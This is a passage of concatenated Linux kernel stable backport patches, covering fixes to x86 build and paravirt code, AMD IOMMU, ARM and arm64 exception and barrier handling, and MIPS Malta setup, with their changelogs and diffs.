EFLAGS: 00000246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88011eb16d40 RDX: ffffffff82485760 RSI: 000000001f288820 RDI: ffffea0000008030 RBP: ffff8800d4aefb90 R08: 00000000000c0000 R09: 0000000000000000 R10: ffffffff821c8e0e R11: 0000000000000000 R12: ffff880000200fb8 R13: 00007f7a4e3f7000 R14: ffffea000303f600 R15: ffff8800d4b562e0 FS: 00007f7a4e3d7840(0000) GS:ffff88011eb00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f7a4e3f7000 CR3: 00000000d3e71000 CR4: 00000000001406e0 Call Trace: _raw_spin_lock+0x27/0x30 handle_pte_fault+0x13db/0x16b0 handle_mm_fault+0x312/0x670 __do_page_fault+0x1b1/0x4e0 do_page_fault+0x22/0x30 page_fault+0x28/0x30 __vfs_read+0x28/0xe0 vfs_read+0x86/0x130 SyS_read+0x46/0xa0 entry_SYSCALL_64_fastpath+0x1e/0xa8 Code: 12 48 c1 ea 0c 83 e8 01 83 e2 30 48 98 48 81 c2 40 6d 01 00 48 03 14 c5 80 6a 5d 82 48 89 0a 8b 41 08 85 c0 75 09 f3 90 8b 41 08 <85> c0 74 f7 4c 8b 09 4d 85 c9 74 08 41 0f 18 09 eb 02 f3 90 8b Reported-by: Łukasz Daniluk Signed-off-by: Steven Rostedt Signed-off-by: Linus Torvalds Signed-off-by: Willy Tarreau --- arch/x86/kernel/paravirt.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/arch/x86/kernel/paravirt.c b/arch/x86/kernel/paravirt.c index cd6de64cc48..8baf3acd707 100644 --- a/arch/x86/kernel/paravirt.c +++ b/arch/x86/kernel/paravirt.c @@ -46,12 +46,12 @@ void _paravirt_nop(void) } /* identity function, which can be inlined */ -u32 _paravirt_ident_32(u32 x) +u32 notrace _paravirt_ident_32(u32 x) { return x; } -u64 _paravirt_ident_64(u64 x) +u64 notrace _paravirt_ident_64(u64 x) { return x; } From 186c5f347bda13e17789ac587a0304d5e0e9c664 Mon Sep 17 00:00:00 2001 From: "H.J. Lu" Date: Wed, 16 Mar 2016 20:04:35 -0700 Subject: [PATCH 051/315] x86/build: Build compressed x86 kernels as PIE commit 6d92bc9d483aa1751755a66fee8fb39dffb088c0 upstream. The 32-bit x86 assembler in binutils 2.26 will generate R_386_GOT32X relocation to get the symbol address in PIC. When the compressed x86 kernel isn't built as PIC, the linker optimizes R_386_GOT32X relocations to their fixed symbol addresses. However, when the compressed x86 kernel is loaded at a different address, it leads to the following load failure: Failed to allocate space for phdrs during the decompression stage. If the compressed x86 kernel is relocatable at run-time, it should be compiled with -fPIE, instead of -fPIC, if possible and should be built as Position Independent Executable (PIE) so that linker won't optimize R_386_GOT32X relocation to its fixed symbol address. Older linkers generate R_386_32 relocations against locally defined symbols, _bss, _ebss, _got and _egot, in PIE. It isn't wrong, just less optimal than R_386_RELATIVE. But the x86 kernel fails to properly handle R_386_32 relocations when relocating the kernel. To generate R_386_RELATIVE relocations, we mark _bss, _ebss, _got and _egot as hidden in both 32-bit and 64-bit x86 kernels. To build a 64-bit compressed x86 kernel as PIE, we need to disable the relocation overflow check to avoid relocation overflow errors. We do this with a new linker command-line option, -z noreloc-overflow, which got added recently: commit 4c10bbaa0912742322f10d9d5bb630ba4e15dfa7 Author: H.J. Lu Date: Tue Mar 15 11:07:06 2016 -0700 Add -z noreloc-overflow option to x86-64 ld Add -z noreloc-overflow command-line option to the x86-64 ELF linker to disable relocation overflow check. This can be used to avoid relocation overflow check if there will be no dynamic relocation overflow at run-time. The 64-bit compressed x86 kernel is built as PIE only if the linker supports -z noreloc-overflow. So far 64-bit relocatable compressed x86 kernel boots fine even when it is built as a normal executable. Signed-off-by: H.J. Lu Cc: Andy Lutomirski Cc: Borislav Petkov Cc: Brian Gerst Cc: Denys Vlasenko Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: linux-kernel@vger.kernel.org [ Edited the changelog and comments. ] Signed-off-by: Ingo Molnar Signed-off-by: Willy Tarreau --- arch/x86/boot/compressed/Makefile | 14 +++++++++++++- arch/x86/boot/compressed/head_32.S | 28 ++++++++++++++++++++++++++++ arch/x86/boot/compressed/head_64.S | 8 ++++++++ 3 files changed, 49 insertions(+), 1 deletion(-) diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile index 7194d9f094b..349cf190d23 100644 --- a/arch/x86/boot/compressed/Makefile +++ b/arch/x86/boot/compressed/Makefile @@ -7,7 +7,7 @@ targets := vmlinux vmlinux.bin vmlinux.bin.gz vmlinux.bin.bz2 vmlinux.bin.lzma vmlinux.bin.xz vmlinux.bin.lzo KBUILD_CFLAGS := -m$(BITS) -D__KERNEL__ $(LINUX_INCLUDE) -O2 -KBUILD_CFLAGS += -fno-strict-aliasing -fPIC +KBUILD_CFLAGS += -fno-strict-aliasing $(call cc-option, -fPIE, -fPIC) KBUILD_CFLAGS += -DDISABLE_BRANCH_PROFILING cflags-$(CONFIG_X86_32) := -march=i386 cflags-$(CONFIG_X86_64) := -mcmodel=small @@ -20,6 +20,18 @@ KBUILD_AFLAGS := $(KBUILD_CFLAGS) -D__ASSEMBLY__ GCOV_PROFILE := n LDFLAGS := -m elf_$(UTS_MACHINE) +ifeq ($(CONFIG_RELOCATABLE),y) +# If kernel is relocatable, build compressed kernel as PIE. +ifeq ($(CONFIG_X86_32),y) +LDFLAGS += $(call ld-option, -pie) $(call ld-option, --no-dynamic-linker) +else +# To build 64-bit compressed kernel as PIE, we disable relocation +# overflow check to avoid relocation overflow error with a new linker +# command-line option, -z noreloc-overflow. +LDFLAGS += $(shell $(LD) --help 2>&1 | grep -q "\-z noreloc-overflow" \ + && echo "-z noreloc-overflow -pie --no-dynamic-linker") +endif +endif LDFLAGS_vmlinux := -T hostprogs-y := mkpiggy diff --git a/arch/x86/boot/compressed/head_32.S b/arch/x86/boot/compressed/head_32.S index 3b28eff9b90..104d7e46a6c 100644 --- a/arch/x86/boot/compressed/head_32.S +++ b/arch/x86/boot/compressed/head_32.S @@ -30,6 +30,34 @@ #include #include +/* + * The 32-bit x86 assembler in binutils 2.26 will generate R_386_GOT32X + * relocation to get the symbol address in PIC. When the compressed x86 + * kernel isn't built as PIC, the linker optimizes R_386_GOT32X + * relocations to their fixed symbol addresses. However, when the + * compressed x86 kernel is loaded at a different address, it leads + * to the following load failure: + * + * Failed to allocate space for phdrs + * + * during the decompression stage. + * + * If the compressed x86 kernel is relocatable at run-time, it should be + * compiled with -fPIE, instead of -fPIC, if possible and should be built as + * Position Independent Executable (PIE) so that linker won't optimize + * R_386_GOT32X relocation to its fixed symbol address. Older + * linkers generate R_386_32 relocations against locally defined symbols, + * _bss, _ebss, _got and _egot, in PIE. It isn't wrong, just less + * optimal than R_386_RELATIVE. But the x86 kernel fails to properly handle + * R_386_32 relocations when relocating the kernel. To generate + * R_386_RELATIVE relocations, we mark _bss, _ebss, _got and _egot as + * hidden: + */ + .hidden _bss + .hidden _ebss + .hidden _got + .hidden _egot + __HEAD ENTRY(startup_32) #ifdef CONFIG_EFI_STUB diff --git a/arch/x86/boot/compressed/head_64.S b/arch/x86/boot/compressed/head_64.S index 92059b8f3f7..6ac508a75ae 100644 --- a/arch/x86/boot/compressed/head_64.S +++ b/arch/x86/boot/compressed/head_64.S @@ -34,6 +34,14 @@ #include #include +/* + * Locally defined symbols should be marked hidden: + */ + .hidden _bss + .hidden _ebss + .hidden _got + .hidden _egot + __HEAD .code32 ENTRY(startup_32) From 69c373d8f72c5b9c757f588f1b06fbd1c8ec3194 Mon Sep 17 00:00:00 2001 From: "Michael S. Tsirkin" Date: Mon, 21 Dec 2015 09:22:18 +0200 Subject: [PATCH 052/315] x86/um: reuse asm-generic/barrier.h commit 577f183acc88645eae116326cc2203dc88ea730c upstream. On x86/um CONFIG_SMP is never defined. As a result, several macros match the asm-generic variant exactly. Drop the local definitions and pull in asm-generic/barrier.h instead. This is in preparation to refactoring this code area. Signed-off-by: Michael S. Tsirkin Acked-by: Arnd Bergmann Acked-by: Richard Weinberger Acked-by: Peter Zijlstra (Intel) Signed-off-by: Willy Tarreau --- arch/x86/um/asm/barrier.h | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/arch/x86/um/asm/barrier.h b/arch/x86/um/asm/barrier.h index 7d01b8c56c0..1da6bb44f94 100644 --- a/arch/x86/um/asm/barrier.h +++ b/arch/x86/um/asm/barrier.h @@ -51,11 +51,7 @@ #else /* CONFIG_SMP */ -#define smp_mb() barrier() -#define smp_rmb() barrier() -#define smp_wmb() barrier() -#define smp_read_barrier_depends() do { } while (0) -#define set_mb(var, value) do { var = value; barrier(); } while (0) +#include #endif /* CONFIG_SMP */ From 56eb0df47a3239e72b70cf93f6f4695ab364dfca Mon Sep 17 00:00:00 2001 From: Joerg Roedel Date: Tue, 26 Jul 2016 15:18:54 +0200 Subject: [PATCH 053/315] iommu/amd: Update Alias-DTE in update_device_table() commit 3254de6bf74fe94c197c9f819fe62a3a3c36f073 upstream. Not doing so might cause IO-Page-Faults when a device uses an alias request-id and the alias-dte is left in a lower page-mode which does not cover the address allocated from the iova-allocator. Fixes: 492667dacc0a ('x86/amd-iommu: Remove amd_iommu_pd_table') Signed-off-by: Joerg Roedel Signed-off-by: Willy Tarreau --- drivers/iommu/amd_iommu.c | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/drivers/iommu/amd_iommu.c b/drivers/iommu/amd_iommu.c index 6bde2a124c7..a3a0567524c 100644 --- a/drivers/iommu/amd_iommu.c +++ b/drivers/iommu/amd_iommu.c @@ -2551,8 +2551,16 @@ static void update_device_table(struct protection_domain *domain) { struct iommu_dev_data *dev_data; - list_for_each_entry(dev_data, &domain->dev_list, list) + list_for_each_entry(dev_data, &domain->dev_list, list) { set_dte_entry(dev_data->devid, domain, dev_data->ats.enabled); + + if (dev_data->alias_data == NULL) + continue; + + /* There is an alias, update device table entry for it */ + set_dte_entry(dev_data->alias_data->devid, domain, + dev_data->alias_data->ats.enabled); + } } static void update_domain(struct protection_domain *domain) From 7a6111b804ca8a4461a884e6494f6f17d6e3460b Mon Sep 17 00:00:00 2001 From: Baoquan He Date: Thu, 15 Sep 2016 16:50:52 +0800 Subject: [PATCH 054/315] iommu/amd: Free domain id when free a domain of struct dma_ops_domain commit c3db901c54466a9c135d1e6e95fec452e8a42666 upstream. The current code missed freeing domain id when free a domain of struct dma_ops_domain. Signed-off-by: Baoquan He Fixes: ec487d1a110a ('x86, AMD IOMMU: add domain allocation and deallocation functions') Signed-off-by: Joerg Roedel Signed-off-by: Willy Tarreau --- drivers/iommu/amd_iommu.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/iommu/amd_iommu.c b/drivers/iommu/amd_iommu.c index a3a0567524c..1c62c248da6 100644 --- a/drivers/iommu/amd_iommu.c +++ b/drivers/iommu/amd_iommu.c @@ -1991,6 +1991,9 @@ static void dma_ops_domain_free(struct dma_ops_domain *dom) kfree(dom->aperture[i]); } + if (dom->domain.id) + domain_id_free(dom->domain.id); + kfree(dom); } From 88654a154ab6581cad22d2d73266b61242410fb8 Mon Sep 17 00:00:00 2001 From: Robin Murphy Date: Mon, 26 Sep 2016 16:50:55 +0100 Subject: [PATCH 055/315] ARM: 8616/1: dt: Respect property size when parsing CPUs commit ba6dea4f7cedb4b1c17e36f4087675d817c2e24b upstream. Whilst MPIDR values themselves are less than 32 bits, it is still perfectly valid for a DT to have #address-cells > 1 in the CPUs node, resulting in the "reg" property having leading zero cell(s). In that situation, the big-endian nature of the data conspires with the current behaviour of only reading the first cell to cause the kernel to think all CPUs have ID 0, and become resoundingly unhappy as a consequence. Take the full property length into account when parsing CPUs so as to be correct under any circumstances. Cc: Russell King Signed-off-by: Robin Murphy Signed-off-by: Russell King Signed-off-by: Willy Tarreau --- arch/arm/kernel/devtree.c | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/arch/arm/kernel/devtree.c b/arch/arm/kernel/devtree.c index 5859c8bc727..c2a6d843200 100644 --- a/arch/arm/kernel/devtree.c +++ b/arch/arm/kernel/devtree.c @@ -90,6 +90,8 @@ void __init arm_dt_init_cpu_maps(void) return; for_each_child_of_node(cpus, cpu) { + const __be32 *cell; + int prop_bytes; u32 hwid; if (of_node_cmp(cpu->type, "cpu")) @@ -101,17 +103,23 @@ void __init arm_dt_init_cpu_maps(void) * properties is considered invalid to build the * cpu_logical_map. */ - if (of_property_read_u32(cpu, "reg", &hwid)) { + cell = of_get_property(cpu, "reg", &prop_bytes); + if (!cell || prop_bytes < sizeof(*cell)) { pr_debug(" * %s missing reg property\n", cpu->full_name); return; } /* - * 8 MSBs must be set to 0 in the DT since the reg property + * Bits n:24 must be set to 0 in the DT since the reg property * defines the MPIDR[23:0]. */ - if (hwid & ~MPIDR_HWID_BITMASK) + do { + hwid = be32_to_cpu(*cell++); + prop_bytes -= sizeof(*cell); + } while (!hwid && prop_bytes > 0); + + if (prop_bytes || (hwid & ~MPIDR_HWID_BITMASK)) return; /* From 1774ca81558342676be0ae3c88008db5a01153c2 Mon Sep 17 00:00:00 2001 From: Srinivas Ramana Date: Fri, 30 Sep 2016 15:03:31 +0100 Subject: [PATCH 056/315] ARM: 8618/1: decompressor: reset ttbcr fields to use TTBR0 on ARMv7 commit 117e5e9c4cfcb7628f08de074fbfefec1bb678b7 upstream. If the bootloader uses the long descriptor format and jumps to kernel decompressor code, TTBCR may not be in a right state. Before enabling the MMU, it is required to clear the TTBCR.PD0 field to use TTBR0 for translation table walks. The commit dbece45894d3a ("ARM: 7501/1: decompressor: reset ttbcr for VMSA ARMv7 cores") does the reset of TTBCR.N, but doesn't consider all the bits for the size of TTBCR.N. Clear TTBCR.PD0 field and reset all the three bits of TTBCR.N to indicate the use of TTBR0 and the correct base address width. Fixes: dbece45894d3 ("ARM: 7501/1: decompressor: reset ttbcr for VMSA ARMv7 cores") Acked-by: Robin Murphy Signed-off-by: Srinivas Ramana Signed-off-by: Russell King Signed-off-by: Willy Tarreau --- arch/arm/boot/compressed/head.S | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/compressed/head.S b/arch/arm/boot/compressed/head.S index 032a8d98714..9fef67ab169 100644 --- a/arch/arm/boot/compressed/head.S +++ b/arch/arm/boot/compressed/head.S @@ -715,7 +715,7 @@ __armv7_mmu_cache_on: orrne r0, r0, #1 @ MMU enabled movne r1, #0xfffffffd @ domain 0 = client bic r6, r6, #1 << 31 @ 32-bit translation system - bic r6, r6, #3 << 0 @ use only ttbr0 + bic r6, r6, #(7 << 0) | (1 << 4) @ use only ttbr0 mcrne p15, 0, r3, c2, c0, 0 @ load page table pointer mcrne p15, 0, r1, c3, c0, 0 @ load domain access control mcrne p15, 0, r6, c2, c0, 2 @ load ttb control From 5b4918cca9112e9baef39f8f84b8d41653c8c959 Mon Sep 17 00:00:00 2001 From: Russell King Date: Fri, 19 Aug 2016 16:34:45 +0100 Subject: [PATCH 057/315] ARM: sa1100: clear reset status prior to reboot commit da60626e7d02a4f385cae80e450afc8b07035368 upstream. Clear the current reset status prior to rebooting the platform. This adds the bit missing from 04fef228fb00 ("[ARM] pxa: introduce reset_status and clear_reset_status for driver's usage"). Fixes: 04fef228fb00 ("[ARM] pxa: introduce reset_status and clear_reset_status for driver's usage") Signed-off-by: Russell King Signed-off-by: Willy Tarreau --- arch/arm/mach-sa1100/generic.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/arch/arm/mach-sa1100/generic.c b/arch/arm/mach-sa1100/generic.c index 9db3e98e8b8..4983b1149ec 100644 --- a/arch/arm/mach-sa1100/generic.c +++ b/arch/arm/mach-sa1100/generic.c @@ -30,6 +30,7 @@ #include #include +#include #include "generic.h" @@ -133,6 +134,7 @@ static void sa1100_power_off(void) void sa11x0_restart(char mode, const char *cmd) { + clear_reset_status(RESET_STATUS_ALL); if (mode == 's') { /* Jump into ROM at address 0 */ soft_restart(0); From eee1bdb52147d2db713d289f5c4e427a235e1600 Mon Sep 17 00:00:00 2001 From: Russell King Date: Tue, 6 Sep 2016 14:34:05 +0100 Subject: [PATCH 058/315] ARM: sa1111: fix pcmcia suspend/resume commit 06dfe5cc0cc684e735cb0232fdb756d30780b05d upstream. SA1111 PCMCIA was broken when PCMCIA switched to using dev_pm_ops for the PCMCIA socket class. PCMCIA used to handle suspend/resume via the socket hosting device, which happened at normal device suspend/resume time. However, the referenced commit changed this: much of the resume now happens much earlier, in the noirq resume handler of dev_pm_ops. However, on SA1111, the PCMCIA device is not accessible as the SA1111 has not been resumed at _noirq time. It's slightly worse than that, because the SA1111 has already been put to sleep at _noirq time, so suspend doesn't work properly. Fix this by converting the core SA1111 code to use dev_pm_ops as well, and performing its own suspend/resume at noirq time. This fixes these errors in the kernel log: pcmcia_socket pcmcia_socket0: time out after reset pcmcia_socket pcmcia_socket1: time out after reset and the resulting lack of PCMCIA cards after a S2RAM cycle. Fixes: d7646f7632549 ("pcmcia: use dev_pm_ops for class pcmcia_socket_class") Signed-off-by: Russell King Signed-off-by: Willy Tarreau --- arch/arm/common/sa1111.c | 22 +++++++++++++--------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/arch/arm/common/sa1111.c b/arch/arm/common/sa1111.c index e57d7e5bf96..932125a2087 100644 --- a/arch/arm/common/sa1111.c +++ b/arch/arm/common/sa1111.c @@ -872,9 +872,9 @@ struct sa1111_save_data { #ifdef CONFIG_PM -static int sa1111_suspend(struct platform_device *dev, pm_message_t state) +static int sa1111_suspend_noirq(struct device *dev) { - struct sa1111 *sachip = platform_get_drvdata(dev); + struct sa1111 *sachip = dev_get_drvdata(dev); struct sa1111_save_data *save; unsigned long flags; unsigned int val; @@ -937,9 +937,9 @@ static int sa1111_suspend(struct platform_device *dev, pm_message_t state) * restored by their respective drivers, and must be called * via LDM after this function. */ -static int sa1111_resume(struct platform_device *dev) +static int sa1111_resume_noirq(struct device *dev) { - struct sa1111 *sachip = platform_get_drvdata(dev); + struct sa1111 *sachip = dev_get_drvdata(dev); struct sa1111_save_data *save; unsigned long flags, id; void __iomem *base; @@ -955,7 +955,7 @@ static int sa1111_resume(struct platform_device *dev) id = sa1111_readl(sachip->base + SA1111_SKID); if ((id & SKID_ID_MASK) != SKID_SA1111_ID) { __sa1111_remove(sachip); - platform_set_drvdata(dev, NULL); + dev_set_drvdata(dev, NULL); kfree(save); return 0; } @@ -1006,8 +1006,8 @@ static int sa1111_resume(struct platform_device *dev) } #else -#define sa1111_suspend NULL -#define sa1111_resume NULL +#define sa1111_suspend_noirq NULL +#define sa1111_resume_noirq NULL #endif static int sa1111_probe(struct platform_device *pdev) @@ -1041,6 +1041,11 @@ static int sa1111_remove(struct platform_device *pdev) return 0; } +static struct dev_pm_ops sa1111_pm_ops = { + .suspend_noirq = sa1111_suspend_noirq, + .resume_noirq = sa1111_resume_noirq, +}; + /* * Not sure if this should be on the system bus or not yet. * We really want some way to register a system device at @@ -1053,11 +1058,10 @@ static int sa1111_remove(struct platform_device *pdev) static struct platform_driver sa1111_device_driver = { .probe = sa1111_probe, .remove = sa1111_remove, - .suspend = sa1111_suspend, - .resume = sa1111_resume, .driver = { .name = "sa1111", .owner = THIS_MODULE, + .pm = &sa1111_pm_ops, }, }; From e5471defd7ea781a60b5f1d7f49d945e113a1e90 Mon Sep 17 00:00:00 2001 From: Mark Rutland Date: Mon, 23 Jan 2017 18:28:50 +0000 Subject: [PATCH 059/315] arm64: avoid returning from bad_mode commit 7d9e8f71b989230bc613d121ca38507d34ada849 upstream. Generally, taking an unexpected exception should be a fatal event, and bad_mode is intended to cater for this. However, it should be possible to contain unexpected synchronous exceptions from EL0 without bringing the kernel down, by sending a SIGILL to the task. We tried to apply this approach in commit 9955ac47f4ba1c95 ("arm64: don't kill the kernel on a bad esr from el0"), by sending a signal for any bad_mode call resulting from an EL0 exception. However, this also applies to other unexpected exceptions, such as SError and FIQ. The entry paths for these exceptions branch to bad_mode without configuring the link register, and have no kernel_exit. Thus, if we take one of these exceptions from EL0, bad_mode will eventually return to the original user link register value. This patch fixes this by introducing a new bad_el0_sync handler to cater for the recoverable case, and restoring bad_mode to its original state, whereby it calls panic() and never returns. The recoverable case branches to bad_el0_sync with a bl, and returns to userspace via the usual ret_to_user mechanism. Signed-off-by: Mark Rutland Fixes: 9955ac47f4ba1c95 ("arm64: don't kill the kernel on a bad esr from el0") Reported-by: Mark Salter Cc: Will Deacon Cc: stable@vger.kernel.org Signed-off-by: Catalin Marinas Signed-off-by: Willy Tarreau --- arch/arm64/kernel/entry.S | 2 +- arch/arm64/kernel/traps.c | 25 +++++++++++++++++++++---- 2 files changed, 22 insertions(+), 5 deletions(-) diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S index 7cd589ebca2..5d515e629d0 100644 --- a/arch/arm64/kernel/entry.S +++ b/arch/arm64/kernel/entry.S @@ -490,7 +490,7 @@ el0_inv: mov x0, sp mov x1, #BAD_SYNC mrs x2, esr_el1 - b bad_mode + b bad_el0_sync ENDPROC(el0_sync) .align 6 diff --git a/arch/arm64/kernel/traps.c b/arch/arm64/kernel/traps.c index f30852d2859..488a7b36d48 100644 --- a/arch/arm64/kernel/traps.c +++ b/arch/arm64/kernel/traps.c @@ -307,16 +307,33 @@ asmlinkage long do_ni_syscall(struct pt_regs *regs) } /* - * bad_mode handles the impossible case in the exception vector. + * bad_mode handles the impossible case in the exception vector. This is always + * fatal. */ asmlinkage void bad_mode(struct pt_regs *regs, int reason, unsigned int esr) +{ + console_verbose(); + + pr_crit("Bad mode in %s handler detected, code 0x%08x\n", + handler[reason], esr); + + die("Oops - bad mode", regs, 0); + local_irq_disable(); + panic("bad mode"); +} + +/* + * bad_el0_sync handles unexpected, but potentially recoverable synchronous + * exceptions taken from EL0. Unlike bad_mode, this returns. + */ +asmlinkage void bad_el0_sync(struct pt_regs *regs, int reason, unsigned int esr) { siginfo_t info; void __user *pc = (void __user *)instruction_pointer(regs); console_verbose(); - pr_crit("Bad mode in %s handler detected, code 0x%08x\n", - handler[reason], esr); + pr_crit("Bad EL0 synchronous exception detected on CPU%d, code 0x%08x\n", + smp_processor_id(), esr); __show_regs(regs); info.si_signo = SIGILL; @@ -324,7 +341,7 @@ asmlinkage void bad_mode(struct pt_regs *regs, int reason, unsigned int esr) info.si_code = ILL_ILLOPC; info.si_addr = pc; - arm64_notify_die("Oops - bad mode", regs, &info, 0); + force_sig_info(info.si_signo, &info, current); } void __pte_error(const char *file, int line, unsigned long val) From 1fd5c7b6545fc2f0dca50d302ac998e668ee2fde Mon Sep 17 00:00:00 2001 From: James Hogan Date: Mon, 25 Jul 2016 16:59:52 +0100 Subject: [PATCH 060/315] arm64: Define AT_VECTOR_SIZE_ARCH for ARCH_DLINFO commit 3146bc64d12377a74dbda12b96ea32da3774ae07 upstream. AT_VECTOR_SIZE_ARCH should be defined with the maximum number of NEW_AUX_ENT entries that ARCH_DLINFO can contain, but it wasn't defined for arm64 at all even though ARCH_DLINFO will contain one NEW_AUX_ENT for the VDSO address. This shouldn't be a problem as AT_VECTOR_SIZE_BASE includes space for AT_BASE_PLATFORM which arm64 doesn't use, but lets define it now and add the comment above ARCH_DLINFO as found in several other architectures to remind future modifiers of ARCH_DLINFO to keep AT_VECTOR_SIZE_ARCH up to date. Fixes: f668cd1673aa ("arm64: ELF definitions") Signed-off-by: James Hogan Cc: Catalin Marinas Cc: Will Deacon Cc: linux-arm-kernel@lists.infradead.org Signed-off-by: Will Deacon Signed-off-by: Willy Tarreau --- arch/arm64/include/asm/elf.h | 1 + arch/arm64/include/uapi/asm/auxvec.h | 2 ++ 2 files changed, 3 insertions(+) diff --git a/arch/arm64/include/asm/elf.h b/arch/arm64/include/asm/elf.h index fe32c0e4ac0..e647e6d7b87 100644 --- a/arch/arm64/include/asm/elf.h +++ b/arch/arm64/include/asm/elf.h @@ -126,6 +126,7 @@ extern unsigned long randomize_et_dyn(unsigned long base); #define SET_PERSONALITY(ex) clear_thread_flag(TIF_32BIT); +/* update AT_VECTOR_SIZE_ARCH if the number of NEW_AUX_ENT entries changes */ #define ARCH_DLINFO \ do { \ NEW_AUX_ENT(AT_SYSINFO_EHDR, \ diff --git a/arch/arm64/include/uapi/asm/auxvec.h b/arch/arm64/include/uapi/asm/auxvec.h index 22d6d888585..4cf0c17787a 100644 --- a/arch/arm64/include/uapi/asm/auxvec.h +++ b/arch/arm64/include/uapi/asm/auxvec.h @@ -19,4 +19,6 @@ /* vDSO location */ #define AT_SYSINFO_EHDR 33 +#define AT_VECTOR_SIZE_ARCH 1 /* entries in ARCH_DLINFO */ + #endif From d65df5171a258ac766fa959cf453c6c7b9851cf3 Mon Sep 17 00:00:00 2001 From: Will Deacon Date: Mon, 5 Sep 2016 11:56:05 +0100 Subject: [PATCH 061/315] arm64: spinlocks: implement smp_mb__before_spinlock() as smp_mb() commit 872c63fbf9e153146b07f0cece4da0d70b283eeb upstream. smp_mb__before_spinlock() is intended to upgrade a spin_lock() operation to a full barrier, such that prior stores are ordered with respect to loads and stores occuring inside the critical section. Unfortunately, the core code defines the barrier as smp_wmb(), which is insufficient to provide the required ordering guarantees when used in conjunction with our load-acquire-based spinlock implementation. This patch overrides the arm64 definition of smp_mb__before_spinlock() to map to a full smp_mb(). Cc: Peter Zijlstra Reported-by: Alan Stern Signed-off-by: Will Deacon Signed-off-by: Catalin Marinas Signed-off-by: Willy Tarreau --- arch/arm64/include/asm/spinlock.h | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/arch/arm64/include/asm/spinlock.h b/arch/arm64/include/asm/spinlock.h index 0defa0728a9..c3cab6f87de 100644 --- a/arch/arm64/include/asm/spinlock.h +++ b/arch/arm64/include/asm/spinlock.h @@ -200,4 +200,14 @@ static inline int arch_read_trylock(arch_rwlock_t *rw) #define arch_read_relax(lock) cpu_relax() #define arch_write_relax(lock) cpu_relax() +/* + * Accesses appearing in program order before a spin_lock() operation + * can be reordered with accesses inside the critical section, by virtue + * of arch_spin_lock being constructed using acquire semantics. + * + * In cases where this is problematic (e.g. try_to_wake_up), an + * smp_mb__before_spinlock() can restore the required ordering. + */ +#define smp_mb__before_spinlock() smp_mb() + #endif /* __ASM_SPINLOCK_H */ From 83099f397a9faaf75a8f249733b2b57d72a264eb Mon Sep 17 00:00:00 2001 From: Will Deacon Date: Fri, 26 Aug 2016 11:36:39 +0100 Subject: [PATCH 062/315] arm64: debug: avoid resetting stepping state machine when TIF_SINGLESTEP commit 3a402a709500c5a3faca2111668c33d96555e35a upstream. When TIF_SINGLESTEP is set for a task, the single-step state machine is enabled and we must take care not to reset it to the active-not-pending state if it is already in the active-pending state. Unfortunately, that's exactly what user_enable_single_step does, by unconditionally setting the SS bit in the SPSR for the current task. This causes failures in the GDB testsuite, where GDB ends up missing expected step traps if the instruction being stepped generates another trap, e.g. PTRACE_EVENT_FORK from an SVC instruction. This patch fixes the problem by preserving the current state of the stepping state machine when TIF_SINGLESTEP is set on the current thread. Cc: Reported-by: Yao Qi Signed-off-by: Will Deacon Signed-off-by: Willy Tarreau --- arch/arm64/kernel/debug-monitors.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/arch/arm64/kernel/debug-monitors.c b/arch/arm64/kernel/debug-monitors.c index f4726dc054b..49e6e304610 100644 --- a/arch/arm64/kernel/debug-monitors.c +++ b/arch/arm64/kernel/debug-monitors.c @@ -276,8 +276,10 @@ int kernel_active_single_step(void) /* ptrace API */ void user_enable_single_step(struct task_struct *task) { - set_ti_thread_flag(task_thread_info(task), TIF_SINGLESTEP); - set_regs_spsr_ss(task_pt_regs(task)); + struct thread_info *ti = task_thread_info(task); + + if (!test_and_set_ti_thread_flag(ti, TIF_SINGLESTEP)) + set_regs_spsr_ss(task_pt_regs(task)); } void user_disable_single_step(struct task_struct *task) From bc9f83ea7f47e55fcd157d209ffa2f97a49bb19b Mon Sep 17 00:00:00 2001 From: Paul Burton Date: Fri, 2 Sep 2016 16:07:10 +0100 Subject: [PATCH 063/315] MIPS: Malta: Fix IOCU disable switch read for MIPS64 commit 305723ab439e14debc1d339aa04e835d488b8253 upstream. Malta boards used with CPU emulators feature a switch to disable use of an IOCU. Software has to check this switch & ignore any present IOCU if the switch is closed. The read used to do this was unsafe for 64 bit kernels, as it simply casted the address 0xbf403000 to a pointer & dereferenced it. Whilst in a 32 bit kernel this would access kseg1, in a 64 bit kernel this attempts to access xuseg & results in an address error exception. Fix by accessing a correctly formed ckseg1 address generated using the CKSEG1ADDR macro. Whilst modifying this code, define the name of the register and the bit we care about within it, which indicates whether PCI DMA is routed to the IOCU or straight to DRAM. The code previously checked that bit 0 was also set, but the least significant 7 bits of the CONFIG_GEN0 register contain the value of the MReqInfo signal provided to the IOCU OCP bus, so singling out bit 0 makes little sense & that part of the check is dropped. Signed-off-by: Paul Burton Fixes: b6d92b4a6bdb ("MIPS: Add option to disable software I/O coherency.") Cc: Matt Redfearn Cc: Masahiro Yamada Cc: Kees Cook Cc: linux-mips@linux-mips.org Cc: linux-kernel@vger.kernel.org Patchwork: https://patchwork.linux-mips.org/patch/14187/ Signed-off-by: Ralf Baechle Signed-off-by: Willy Tarreau --- arch/mips/mti-malta/malta-setup.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/arch/mips/mti-malta/malta-setup.c b/arch/mips/mti-malta/malta-setup.c index c72a0693678..2046e1c385d 100644 --- a/arch/mips/mti-malta/malta-setup.c +++ b/arch/mips/mti-malta/malta-setup.c @@ -36,6 +36,9 @@ #include #endif 